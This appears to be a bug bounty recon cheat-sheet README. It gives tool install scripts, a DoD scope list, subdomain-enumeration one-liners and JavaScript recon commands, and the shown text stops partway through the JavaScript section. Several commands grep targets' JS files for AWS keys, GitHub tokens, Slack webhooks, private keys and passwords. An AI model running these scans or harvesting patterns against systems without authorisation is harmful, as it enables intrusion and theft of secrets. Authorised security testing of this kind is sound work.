💀 KingOfBugBountyTips 💀

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⡿⠋⠉⠉⠉⠉⠉⠉⠙⢿⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⡿⠀⠀⢀⣤⣤⡀⠀⢀⣤⣤⡀⠀⢿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⡇⠀⠀⠈⣿⣿⡇⠀⢸⣿⣿⠁⠀⢸⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀
⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠘⠛⠃⠀⠘⠛⠃⠀⠀⣼⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀
⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣷⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣾⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⢿⣿⣿⣿⣿⣿⣿⡿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

☠️ K I N G O F B U G B O U N T Y ☠️

💀 KingOfBugBountyTips 💀

☠️ The Ultimate Bug Bounty Reconnaissance Arsenal ☠️

"In the shadows we hunt, in the code we trust" 🏴‍☠️

🔗 Connect with the Hacker

╔══════════════════════════════════════════════════════════════════╗
║  "The quieter you become, the more you are able to hear" - Kali  ║
╚══════════════════════════════════════════════════════════════════╝

🎖️ Department of Defense - Bug Bounty Program

🛡️ DoD
_{Department of Defense}

⭐ Army
_{U.S. Army}

⚓ Navy
_{U.S. Navy}

✈️ Air Force
_{U.S. Air Force}

🦅 Marines
_{U.S. Marines}

🚀 Space Force
_{U.S. Space Force}

📋 Full DoD Scope - 19 Domains (Click to expand)

# 🎯 BBRF Scope - All DoD Domains (Copy & Paste Ready)
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'

🎖️ Military Branches	🏛️ DoD Agencies	🔧 Support Commands
`.af.mil` - Air Force `.army.mil` - Army `.marines.mil` - Marines `.navy.mil` - Navy `.spaceforce.mil` - Space Force `.ussf.mil` - Space Force	`.pentagon.mil` - Pentagon HQ `.osd.mil` - Office of SecDef `.disa.mil` - Defense Info Systems `.dtra.mil` - Threat Reduction `.dla.mil` - Logistics Agency `.dcma.mil` - Contract Management	`.dtic.mil` - Tech Info Center `.dau.mil` - Acquisition Univ `.health.mil` - Military Health `.ng.mil` - National Guard `.uscg.mil` - Coast Guard `.socom.mil` - Special Operations `.dds.mil` - Digital Service `.yellowribbon.mil` - Yellow Ribbon

📚 Table of Contents

Click to expand navigation

Section	Description
About	Project overview and goals
Quick Start	Get started in 5 minutes
Required Tools	Essential toolset
BBRF Scope DoD	DoD scope configuration
Subdomain Enumeration	Finding subdomains
JavaScript Recon	JS file analysis
XSS Detection	Cross-site scripting
SQL Injection	SQLi techniques
SSRF & SSTI	Server-side attacks
Web Crawling	Deep crawling methods
Parameter Discovery	Hidden params
Content Discovery	Sensitive files
Nuclei Scanning	Automated scanning
API Security Testing	API vulnerabilities
Cloud Security	AWS, GCP, Azure
Automation Scripts	Ready-to-use scripts
Bash Functions	Shell productivity
New Oneliners 2024-2025	Latest techniques
Search Engines	Hacker search engines
Wordlists	Best wordlists
Resources	Books, courses, blogs

🎯 About

Our main goal is to share tips from well-known bug hunters. Using recon methodology, we find subdomains, APIs, and tokens that are exploitable. We aim to influence the community with Oneliner tips for better understanding.

🏆 What Makes This Repository Special?

400+ Curated Oneliners - Battle-tested commands from real bug bounty hunters
Complete Methodology - From recon to exploitation
Constantly Updated - New techniques added regularly
Community Driven - Contributions from top hunters worldwide

Download BugBuntu:

🚀 Quick Start

Get your first recon running in under 5 minutes:

# 1. Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# 2. Run your first recon
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# 3. Profit! 🎉

🛠️ Required Tools

Click to expand complete tool list

Core Tools

Category	Tools	Installation
Subdomain	Subfinder, Amass, Assetfinder, Findomain, Chaos	`go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest`
HTTP Probing	Httpx, Httprobe	`go install github.com/projectdiscovery/httpx/cmd/httpx@latest`
Crawling	Katana, Gospider, Hakrawler, Cariddi	`go install github.com/projectdiscovery/katana/cmd/katana@latest`
URLs	Gau, Waybackurls, Waymore	`go install github.com/lc/gau/v2/cmd/gau@latest`
Scanning	Nuclei, Jaeles, Naabu	`go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest`
XSS	Dalfox, XSStrike, Kxss, Airixss	`go install github.com/hahwul/dalfox/v2@latest`
SQLi	SQLMap, Ghauri	`pip install sqlmap ghauri`
Utilities	Anew, Qsreplace, Unfurl, Gf, Uro	`go install github.com/tomnomnom/anew@latest`
Fuzzing	Ffuf, Feroxbuster	`go install github.com/ffuf/ffuf/v2@latest`
JS Analysis	Subjs, LinkFinder, SecretFinder, Jsubfinder	`go install github.com/lc/subjs@latest`
Cert Monitoring	Certstream, Certstream-go	`pip install certstream`
DNS	Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen	`go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest`
Reverse DNS	Hakrevdns, Prips	`go install github.com/hakluke/hakrevdns@latest`
API Discovery	Arjun, x8, ParamSpider	`pip install arjun`
Screenshots	Gowitness, Eyewitness	`go install github.com/sensepost/gowitness@latest`
Cloud	AWS CLI, CloudEnum, S3Scanner	`pip install awscli`
OSINT	Shodan CLI, Censys, Metabigor	`pip install shodan censys`
Git Recon	Trufflehog, Gitrob, Github-Subdomains	`go install github.com/trufflesecurity/trufflehog/v3@latest`
Scope Management	BBRF	`pip install bbrf`

System Dependencies

# Ubuntu/Debian
sudo apt update && sudo apt install -y \
    jq \
    curl \
    wget \
    git \
    python3 \
    python3-pip \
    golang-go \
    nmap \
    masscan \
    chromium-browser \
    parallel \
    whois \
    dnsutils \
    libpcap-dev \
    build-essential

# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

Go Environment Setup

# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Quick Install Script - Go Tools

#!/bin/bash
# One-click install for all Go tools

echo "[*] Installing Go tools..."
go_tools=(
    # ProjectDiscovery
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
    "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
    "github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
    # Tomnomnom
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/tomnomnom/assetfinder@latest"
    "github.com/tomnomnom/httprobe@latest"
    # Fuzzing & Crawling
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
    "github.com/hakluke/hakrevdns@latest"
    # Security
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/lc/subjs@latest"
    # Screenshots & Utils
    "github.com/sensepost/gowitness@latest"
    "github.com/d3mondev/puredns/v2@latest"
    "github.com/j3ssie/metabigor@latest"
    "github.com/Emoe/kxss@latest"
    "github.com/ferreiraklet/airixss@latest"
    "github.com/edoardottt/cariddi/cmd/cariddi@latest"
    "github.com/trufflesecurity/trufflehog/v3@latest"
)

for tool in "${go_tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool" 2>/dev/null
done

echo "[✓] Go tools installed!"

Quick Install Script - Python Tools

#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Quick Install Script - Rust Tools (Feroxbuster)

#!/bin/bash
# Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

# Install Rust if not present
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi

# Install Feroxbuster
cargo install feroxbuster

echo "[✓] Rust tools installed!"

Quick Install Script - External Tools

#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Master Install Script (All-in-One)

#!/bin/bash
# MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗"
echo "║     KingOfBugBounty - Complete Tool Installation         ║"
echo "╚══════════════════════════════════════════════════════════╝"

# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc

# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi
cargo install feroxbuster

# Update Nuclei templates
nuclei -update-templates

echo ""
echo "╔══════════════════════════════════════════════════════════╗"
echo "║            ✓ Installation Complete!                      ║"
echo "╚══════════════════════════════════════════════════════════╝"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"

Wordlists Installation

#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Verify Installation

#!/bin/bash
# Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do
    if command -v $tool &> /dev/null; then
        echo "[✓] $tool"
    else
        echo "[✗] $tool - NOT FOUND"
    fi
done

🎯 BBRF Scope DoD

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Subdomain Enumeration ☠️

███████╗██╗   ██╗██████╗ ██████╗  ██████╗ ███╗   ███╗ █████╗ ██╗███╗   ██╗
██╔════╝██║   ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗  ██║
███████╗██║   ██║██████╔╝██║  ██║██║   ██║██╔████╔██║███████║██║██╔██╗ ██║
╚════██║██║   ██║██╔══██╗██║  ██║██║   ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║
███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║  ██║██║██║ ╚████║
╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝  ╚═════╝ ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝

☠️ ENUMERATE EVERYTHING ☠️

💀 Multi-Source Discovery (All-in-One)

# ☠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

💀 Certificate Transparency Logs

# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Certstream Real-Time Monitoring - Basic

# ☠️ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

💀 Certstream with Domain Filter

# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream to Subdomain Discovery

# ☠️ Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

💀 Certstream + httpx Live Pipeline

# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Certstream Phishing Detection

# ☠️ Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

💀 Certstream with Nuclei Auto-Scan

# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Certstream Mass Collector Script

# ☠️ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

💀 Certstream Wildcard Certificate Hunter

# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Certstream + Shodan Enrichment

# ☠️ Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

💀 Certstream JSON Logger with Timestamp

# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Bug Bounty Scope Monitor

# ☠️ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

💀 Shodan + Nuclei Pipeline

# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 ASN Discovery & Reverse DNS

# ☠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

💀 DNS Bruteforce with Shuffledns

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Recursive Subdomain Enum

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

💀 Passive DNS - Multiple Sources

# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 GitHub Subdomain Scraping

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

💀 Censys Subdomain Discovery

# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API

# ☠️ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

💀 Wayback Machine Subdomains

# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 CommonCrawl Extraction

# ☠️ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

💀 VirusTotal Subdomains

# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 DNS Zone Transfer Attempt

# ☠️ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

💀 Reverse IP Lookup

# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN Range Scanner

# ☠️ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

💀 PTR Records from IP Range

# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 All-in-One Mega Oneliner

# ☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

💀 Subdomain Permutation/Bruteforce

# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS Wordlist Bruteforce with PureDNS

# ☠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

💀 TLS/SSL Certificate Grabber

# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan

# ☠️ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

💀 Google Dork Subdomain Discovery

# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

📜 JavaScript Recon

Complete JS Pipeline

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

Extract Secrets from JS

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder on JS Files

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

SecretFinder Mass Scan

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS Variables Extraction

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

API Keys from JS

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extract All URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt

Find API Endpoints in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extract Hardcoded Credentials

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

Extract AWS Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extract Google API Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt

Extract Firebase URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extract S3 Buckets from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

Extract Internal IPs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extract Slack Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

Extract GitHub Tokens from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extract Private Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

Extract Email Addresses from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extract Hidden Subdomains from JS

